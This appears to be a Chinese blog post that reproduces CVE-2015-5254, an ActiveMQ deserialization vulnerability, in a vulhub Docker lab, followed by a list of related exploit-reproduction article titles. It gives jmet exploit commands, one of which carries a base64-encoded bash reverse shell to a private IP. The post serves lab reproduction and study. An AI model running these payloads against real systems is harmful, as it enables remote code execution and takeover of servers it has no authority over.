ActiveMQ 反序列化漏洞復現(CVE-2015-5254)
環境搭建
影響Apache ActiveMQ 5.13.0之前的版本
使用vulhub搭建環境,docker-compose up -d
環境搭建以後,開始監聽8161和61616兩個埠,其中8161是web管理端的埠,61616是工作埠。
復現過程
- 構造(可以使用ysoserial)可執行命令的序列化物件
- 作為一個訊息,傳送給目標61616埠
- 訪問web管理頁面,讀取訊息,觸發漏洞
生成序列化物件
使用jmt生成,在同目錄下建立一個external資料夾,不然可能報檔案不存在錯誤。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP 61616
在伺服器中執行:docker-compose exec activemq bash,ls /tmp,發現success生成。
將生成的序列化物件中的payload變成反彈webshell的命令
使用base64編碼反彈shell命令在進行生成
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME IP 61616
相關文章
- Fastjson反序列化漏洞復現ASTJSON
- Fastjson1.2.24反序列化漏洞復現ASTJSON
- Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)復現ApacheMQ
- Apache漏洞復現Apache
- weblogic 漏洞復現Web
- 笑臉漏洞復現
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- 網站安全防護-PHP反序列化漏洞修復網站PHP
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- weblogic ssrf漏洞復現Web
- Tomcat系列漏洞復現Tomcat
- Vulhub WebLogic漏洞復現Web
- 護網漏洞復現(三)
- 【漏洞復現】Redis未授權訪問漏洞Redis
- Java序列化、反序列化、反序列化漏洞Java
- Weblogic-SSRF漏洞復現Web
- nginx目錄穿越漏洞復現Nginx
- 【漏洞復現】Paraluni 安全事件分析事件
- Redis未授權漏洞復現Redis
- 修復weblogic的JAVA反序列化漏洞的多種方法WebJava
- php反序列化漏洞PHP
- JMX 反序列化漏洞
- java 反序列化 cc1 復現Java
- java 反序列化 cc6 復現Java
- 資料庫安全-ElasticSearch漏洞復現資料庫Elasticsearch
- 某小型CMS漏洞復現審計
- WEB漏洞——PHP反序列化WebPHP
- python 反序列化漏洞Python
- fastjson反序列化漏洞ASTJSON
- Weblogic修復"Java反序列化"過程遠端命令執行漏洞WebJava
- PHP檔案包含漏洞(利用phpinfo)復現PHP
- PHPMailer遠端命令執行漏洞復現PHPAI
- 常見中介軟體漏洞復現(上)
- java反序列化——apache-shiro復現分析JavaApache
- Fastjson 反序列化漏洞史ASTJSON
- PHP反序列化漏洞總結PHP
- php xss 反序列化漏洞PHP
- PHP現反序列化漏洞 或使WordPress遭遠端攻擊PHP